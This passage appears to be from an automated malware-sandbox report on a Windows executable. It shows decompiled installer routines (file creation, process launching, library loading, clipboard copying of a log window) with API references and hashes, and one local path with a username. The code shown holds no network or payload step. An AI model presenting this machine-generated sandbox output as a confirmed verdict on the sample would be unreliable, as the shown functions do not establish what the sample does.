                                  • API ID: File$Attributes$DeleteDirectoryRemove
                                  • String ID:
                                  • API String ID: 1655745494-0
                                  • Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                  • Instruction ID: 9515068513ade5ae1f55316d2df80b31020678a3208768e1cfdcfcd0005f1fec
                                  • Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                  • Instruction Fuzzy Hash: 98E0E53110CB915AD21067348D08B5F7AE8EF86314F04093AF891F10C0D7789807CA7A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040697F(void* __ecx, void* _a4) {
                                  				long _v8;
                                  				long _t6;
                                  
                                  				_t6 = WaitForSingleObject(_a4, 0x64);
                                  				while(_t6 == 0x102) {
                                  					E00406910(0xf);
                                  					_t6 = WaitForSingleObject(_a4, 0x64);
                                  				}
                                  				GetExitCodeProcess(_a4,  &_v8); // executed
                                  				return _v8;
                                  			}






                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004069A5
                                  • GetExitCodeProcess.KERNELBASE ref: 004069B2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: ObjectSingleWait$CodeExitProcess
                                  • String ID:
                                  • API String ID: 2567322000-0
                                  • Opcode ID: b4e22deffd65f84e370c04cbd1d88a1e749a9585608b68ea3518500749b930bb
                                  • Instruction ID: 36eed24e95c07865df7b56cd3c3a37613c402ee52c1e894a6bace4c6932a2b17
                                  • Opcode Fuzzy Hash: b4e22deffd65f84e370c04cbd1d88a1e749a9585608b68ea3518500749b930bb
                                  • Instruction Fuzzy Hash: 25E0D8B1600508FBDF109B55DD06E9E7B6EDB84700F110037F601B61A0C7B6AE61DBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E004015C1(short __ebx, void* __eflags) {
                                  				void* _t17;
                                  				int _t23;
                                  				void* _t25;
                                  				signed char _t26;
                                  				short _t28;
                                  				short _t31;
                                  				short* _t34;
                                  				void* _t36;
                                  
                                  				_t28 = __ebx;
                                  				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                  				_t17 = E00405E81(_t16);
                                  				_t32 = _t17;
                                  				if(_t17 != __ebx) {
                                  					do {
                                  						_t34 = E00405E03(_t32, 0x5c);
                                  						_t31 =  *_t34;
                                  						 *_t34 = _t28;
                                  						if(_t31 != _t28) {
                                  							L5:
                                  							_t25 = E00405AB5( *(_t36 + 8));
                                  						} else {
                                  							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                  							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AD2(_t42) == 0) {
                                  								goto L5;
                                  							} else {
                                  								_t25 = E00405A38( *(_t36 + 8)); // executed
                                  							}
                                  						}
                                  						if(_t25 != _t28) {
                                  							if(_t25 != 0xb7) {
                                  								L9:
                                  								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                  							} else {
                                  								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                  								if((_t26 & 0x00000010) == 0) {
                                  									goto L9;
                                  								}
                                  							}
                                  						}
                                  						 *_t34 = _t31;
                                  						_t32 = _t34 + 2;
                                  					} while (_t31 != _t28);
                                  				}
                                  				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                  					_push(0xfffffff5);
                                  					E00401423();
                                  				} else {
                                  					E00401423(0xffffffe6);
                                  					E00406507(0x436000,  *(_t36 + 8));
                                  					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                  					if(_t23 == 0) {
                                  						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                  					}
                                  				}
                                  				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t36 - 4));
                                  				return 0;
                                  			}












                                  APIs
                                    • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                    • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                    • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                    • Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                  • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                  • String ID:
                                  • API String ID: 1892508949-0
                                  • Opcode ID: 6ff43b3191649a75527d97ac2c164a3e64988898bdda7d9265b57bfb7f9fc5be
                                  • Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
                                  • Opcode Fuzzy Hash: 6ff43b3191649a75527d97ac2c164a3e64988898bdda7d9265b57bfb7f9fc5be
                                  • Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E00401389(signed int _a4) {
                                  				intOrPtr* _t6;
                                  				void* _t8;
                                  				void* _t10;
                                  				signed int _t11;
                                  				void* _t12;
                                  				signed int _t16;
                                  				signed int _t17;
                                  				void* _t18;
                                  
                                  				_t17 = _a4;
                                  				while(_t17 >= 0) {
                                  					_t6 = _t17 * 0x1c +  *0x42a250;
                                  					if( *_t6 == 1) {
                                  						break;
                                  					}
                                  					_push(_t6); // executed
                                  					_t8 = E00401434(); // executed
                                  					if(_t8 == 0x7fffffff) {
                                  						return 0x7fffffff;
                                  					}
                                  					_t10 = E0040136D(_t8);
                                  					if(_t10 != 0) {
                                  						_t11 = _t10 - 1;
                                  						_t16 = _t17;
                                  						_t17 = _t11;
                                  						_t12 = _t11 - _t16;
                                  					} else {
                                  						_t12 = _t10 + 1;
                                  						_t17 = _t17 + 1;
                                  					}
                                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                  						 *0x42920c =  *0x42920c + _t12;
                                  						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42920c, 0x7530,  *0x4291f4), 0);
                                  					}
                                  				}
                                  				return 0;
                                  			}












                                  APIs
                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                  • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                  • Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
                                  • Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                  • Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405AEA(WCHAR* _a4) {
                                  				struct _PROCESS_INFORMATION _v20;
                                  				int _t7;
                                  
                                  				0x426710->cb = 0x44;
                                  				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426710,  &_v20); // executed
                                  				if(_t7 != 0) {
                                  					CloseHandle(_v20.hThread);
                                  					return _v20.hProcess;
                                  				}
                                  				return _t7;
                                  			}






                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleProcess
                                  • String ID:
                                  • API String ID: 3712363035-0
                                  • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                  • Instruction ID: 90cc6d476167cb297d6b140a5f1e3d8b94c2ff7c6bb70ea469832da4d223c92c
                                  • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                  • Instruction Fuzzy Hash: F2E0BFB46002097FEB109B64ED45F7B77BCEB04608F414465BD54F6150DB74A9158E7C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004068D4(signed int _a4) {
                                  				struct HINSTANCE__* _t5;
                                  				signed int _t10;
                                  
                                  				_t10 = _a4 << 3;
                                  				_t8 =  *(_t10 + 0x40a3e0);
                                  				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                  				if(_t5 != 0) {
                                  					L2:
                                  					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                  				}
                                  				_t5 = E00406864(_t8); // executed
                                  				if(_t5 == 0) {
                                  					return 0;
                                  				}
                                  				goto L2;
                                  			}






                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                    • Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                    • Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
                                    • Part of subcall function 00406864: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                  • String ID:
                                  • API String ID: 2547128583-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00405FF7(WCHAR* _a4, long _a8, long _a12) {
                                  				signed int _t5;
                                  				void* _t6;
                                  
                                  				_t5 = GetFileAttributesW(_a4); // executed
                                  				asm("sbb ecx, ecx");
                                  				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                  				return _t6;
                                  			}






                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\4505682666.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: File$AttributesCreate
                                  • String ID:
                                  • API String ID: 415043291-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405FD2(WCHAR* _a4) {
                                  				signed char _t3;
                                  				signed char _t7;
                                  
                                  				_t3 = GetFileAttributesW(_a4); // executed
                                  				_t7 = _t3;
                                  				if(_t7 != 0xffffffff) {
                                  					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                                  				}
                                  				return _t7;
                                  			}






                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
                                  • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405FEB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403ADC() {
                                  				void* _t1;
                                  				void* _t3;
                                  				signed int _t6;
                                  
                                  				_t1 =  *0x40a018; // 0xffffffff
                                  				if(_t1 != 0xffffffff) {
                                  					CloseHandle(_t1);
                                  					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                  					_t6 =  *0x40a018;
                                  				}
                                  				E00403B21();
                                  				_t3 = E00405C13(_t6, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nsz176C.tmp\\", 7); // executed
                                  				return _t3;
                                  			}







                                  APIs
                                  • CloseHandle.KERNEL32(FFFFFFFF,00403A28,?), ref: 00403AE7
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsz176C.tmp\, xrefs: 00403AFB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsz176C.tmp\
                                  • API String ID: 2962429428-4019556525
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405AB5(WCHAR* _a4) {
                                  				int _t2;
                                  
                                  				_t2 = CreateDirectoryW(_a4, 0); // executed
                                  				if(_t2 == 0) {
                                  					return GetLastError();
                                  				}
                                  				return 0;
                                  			}





                                  APIs
                                  • CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                  • GetLastError.KERNEL32 ref: 00405AC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: CreateDirectoryErrorLast
                                  • String ID:
                                  • API String ID: 1375471231-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040607A(void* _a4, void* _a8, long _a12) {
                                  				int _t7;
                                  				long _t11;
                                  
                                  				_t11 = _a12;
                                  				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                  				if(_t7 == 0 || _t11 != _a12) {
                                  					return 0;
                                  				} else {
                                  					return 1;
                                  				}
                                  			}






                                  APIs
                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004060A9(void* _a4, void* _a8, long _a12) {
                                  				int _t7;
                                  				long _t11;
                                  
                                  				_t11 = _a12;
                                  				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                  				if(_t7 == 0 || _t11 != _a12) {
                                  					return 0;
                                  				} else {
                                  					return 1;
                                  				}
                                  			}






                                  APIs
                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004034AF(long _a4) {
                                  				long _t2;
                                  
                                  				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                  				return _t2;
                                  			}





                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E00401FA4() {
                                  				void* _t9;
                                  				char _t13;
                                  				void* _t15;
                                  				void* _t17;
                                  				void* _t20;
                                  				void* _t22;
                                  
                                  				_t19 = E00402DA6(_t15);
                                  				E00405569(0xffffffeb, _t7);
                                  				_t9 = E00405AEA(_t19); // executed
                                  				_t20 = _t9;
                                  				if(_t20 == _t15) {
                                  					 *((intOrPtr*)(_t22 - 4)) = 1;
                                  				} else {
                                  					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                  						_t13 = E0040697F(_t17, _t20); // executed
                                  						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                  							if(_t13 != _t15) {
                                  								 *((intOrPtr*)(_t22 - 4)) = 1;
                                  							}
                                  						} else {
                                  							E0040644E( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                  						}
                                  					}
                                  					_push(_t20);
                                  					CloseHandle();
                                  				}
                                  				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t22 - 4));
                                  				return 0;
                                  			}










                                  APIs
                                    • Part of subcall function 00405569: lstrlenW.KERNEL32(004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                    • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                    • Part of subcall function 00405569: lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
                                    • Part of subcall function 00405569: SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
                                    • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                    • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                    • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                    • Part of subcall function 00405AEA: CreateProcessW.KERNELBASE ref: 00405B13
                                    • Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                    • Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
                                    • Part of subcall function 0040697F: GetExitCodeProcess.KERNELBASE ref: 004069B2
                                    • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                  • String ID:
                                  • API String ID: 2972824698-0
                                  • Opcode ID: 7a4d027f099effcba9a875e41588830efd81f609a84ab4e326c73c2aaae1a309
                                  • Instruction ID: 8c0427486d29053335645041865d96f0af5997519b71f4a23b4502285a2a7229
                                  • Opcode Fuzzy Hash: 7a4d027f099effcba9a875e41588830efd81f609a84ab4e326c73c2aaae1a309
                                  • Instruction Fuzzy Hash: 4AF09072904012EBCB21ABA59994E9E72A4DF00318F25413BE102B21E1D77C4E528AAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E004056A8(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                  				struct HWND__* _v8;
                                  				long _v12;
                                  				struct tagRECT _v28;
                                  				void* _v36;
                                  				signed int _v40;
                                  				int _v44;
                                  				int _v48;
                                  				signed int _v52;
                                  				int _v56;
                                  				void* _v60;
                                  				void* _v68;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				struct HWND__* _t94;
                                  				long _t95;
                                  				int _t100;
                                  				void* _t108;
                                  				intOrPtr _t130;
                                  				struct HWND__* _t134;
                                  				int _t156;
                                  				int _t159;
                                  				struct HMENU__* _t164;
                                  				struct HWND__* _t168;
                                  				struct HWND__* _t169;
                                  				int _t171;
                                  				void* _t172;
                                  				short* _t173;
                                  				short* _t175;
                                  				int _t177;
                                  
                                  				_t169 =  *0x429204;
                                  				_t156 = 0;
                                  				_v8 = _t169;
                                  				if(_a8 != 0x110) {
                                  					if(_a8 == 0x405) {
                                  						CloseHandle(CreateThread(0, 0, E0040563C, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                  					}
                                  					if(_a8 != 0x111) {
                                  						L17:
                                  						_t171 = 1;
                                  						if(_a8 != 0x404) {
                                  							L25:
                                  							if(_a8 != 0x7b) {
                                  								goto L20;
                                  							}
                                  							_t94 = _v8;
                                  							if(_a12 != _t94) {
                                  								goto L20;
                                  							}
                                  							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                  							_a8 = _t95;
                                  							if(_t95 <= _t156) {
                                  								L36:
                                  								return 0;
                                  							}
                                  							_t164 = CreatePopupMenu();
                                  							AppendMenuW(_t164, _t156, _t171, E00406544(_t156, _t164, _t171, _t156, 0xffffffe1));
                                  							_t100 = _a16;
                                  							_t159 = _a16 >> 0x10;
                                  							if(_a16 == 0xffffffff) {
                                  								GetWindowRect(_v8,  &_v28);
                                  								_t100 = _v28.left;
                                  								_t159 = _v28.top;
                                  							}
                                  							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                  								_v60 = _t156;
                                  								_v48 = 0x423708;
                                  								_v44 = 0x1000;
                                  								_a4 = _a8;
                                  								do {
                                  									_a4 = _a4 - 1;
                                  									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                  								} while (_a4 != _t156);
                                  								OpenClipboard(_t156);
                                  								EmptyClipboard();
                                  								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                  								_a4 = _t108;
                                  								_t172 = GlobalLock(_t108);
                                  								do {
                                  									_v48 = _t172;
                                  									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                  									 *_t173 = 0xd;
                                  									_t175 = _t173 + 2;
                                  									 *_t175 = 0xa;
                                  									_t172 = _t175 + 2;
                                  									_t156 = _t156 + 1;
                                  								} while (_t156 < _a8);
                                  								GlobalUnlock(_a4);
                                  								SetClipboardData(0xd, _a4);
                                  								CloseClipboard();
                                  							}
                                  							goto L36;
                                  						}
                                  						if( *0x4291ec == _t156) {
                                  							ShowWindow( *0x42a228, 8);
                                  							if( *0x42a2ac == _t156) {
                                  								E00405569( *((intOrPtr*)( *0x4226e0 + 0x34)), _t156);
                                  							}
                                  							E0040443C(_t171);
                                  							goto L25;
                                  						}
                                  						 *0x421ed8 = 2;
                                  						E0040443C(0x78);
                                  						goto L20;
                                  					} else {
                                  						if(_a12 != 0x403) {
                                  							L20:
                                  							return E004044CA(_a8, _a12, _a16);
                                  						}
                                  						ShowWindow( *0x4291f0, _t156);
                                  						ShowWindow(_t169, 8);
                                  						E00404498(_t169);
                                  						goto L17;
                                  					}
                                  				}
                                  				_v52 = _v52 | 0xffffffff;
                                  				_v40 = _v40 | 0xffffffff;
                                  				_t177 = 2;
                                  				_v60 = _t177;
                                  				_v56 = 0;
                                  				_v48 = 0;
                                  				_v44 = 0;
                                  				asm("stosd");
                                  				asm("stosd");
                                  				_t130 =  *0x42a230;
                                  				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                  				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                  				 *0x4291f0 = GetDlgItem(_a4, 0x403);
                                  				 *0x4291e8 = GetDlgItem(_a4, 0x3ee);
                                  				_t134 = GetDlgItem(_a4, 0x3f8);
                                  				 *0x429204 = _t134;
                                  				_v8 = _t134;
                                  				E00404498( *0x4291f0);
                                  				 *0x4291f4 = E00404DF1(4);
                                  				 *0x42920c = 0;
                                  				GetClientRect(_v8,  &_v28);
                                  				_v52 = _v28.right - GetSystemMetrics(_t177);
                                  				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                  				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                  				if(_a8 >= 0) {
                                  					SendMessageW(_v8, 0x1001, 0, _a8);
                                  					SendMessageW(_v8, 0x1026, 0, _a8);
                                  				}
                                  				if(_a12 >= _t156) {
                                  					SendMessageW(_v8, 0x1024, _t156, _a12);
                                  				}
                                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                                  				_push(0x1b);
                                  				E00404463(_a4);
                                  				if(( *0x42a238 & 0x00000003) != 0) {
                                  					ShowWindow( *0x4291f0, _t156);
                                  					if(( *0x42a238 & 0x00000002) != 0) {
                                  						 *0x4291f0 = _t156;
                                  					} else {
                                  						ShowWindow(_v8, 8);
                                  					}
                                  					E00404498( *0x4291e8);
                                  				}
                                  				_t168 = GetDlgItem(_a4, 0x3ec);
                                  				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                  				if(( *0x42a238 & 0x00000004) != 0) {
                                  					SendMessageW(_t168, 0x409, _t156, _a12);
                                  					SendMessageW(_t168, 0x2001, _t156, _a8);
                                  				}
                                  				goto L36;
                                  			}


































                                  APIs
                                  • GetDlgItem.USER32 ref: 00405706
                                  • GetDlgItem.USER32 ref: 00405715
                                  • GetClientRect.USER32 ref: 00405752
                                  • GetSystemMetrics.USER32 ref: 00405759
                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
                                  • ShowWindow.USER32(?,00000008), ref: 004057F5
                                  • GetDlgItem.USER32 ref: 00405816
                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
                                  • GetDlgItem.USER32 ref: 00405724
                                    • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                  • GetDlgItem.USER32 ref: 00405868
                                  • CreateThread.KERNEL32 ref: 00405876
                                  • CloseHandle.KERNEL32(00000000), ref: 0040587D
                                  • ShowWindow.USER32(00000000), ref: 004058A1
                                  • ShowWindow.USER32(?,00000008), ref: 004058A6
                                  • ShowWindow.USER32(00000008), ref: 004058F0
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
                                  • CreatePopupMenu.USER32 ref: 00405935
                                  • AppendMenuW.USER32 ref: 00405949
                                  • GetWindowRect.USER32 ref: 00405969
                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
                                  • OpenClipboard.USER32(00000000), ref: 004059CA
                                  • EmptyClipboard.USER32 ref: 004059D0
                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
                                  • GlobalLock.KERNEL32 ref: 004059E6
                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
                                  • CloseClipboard.USER32 ref: 00405A2B
                                  Strings
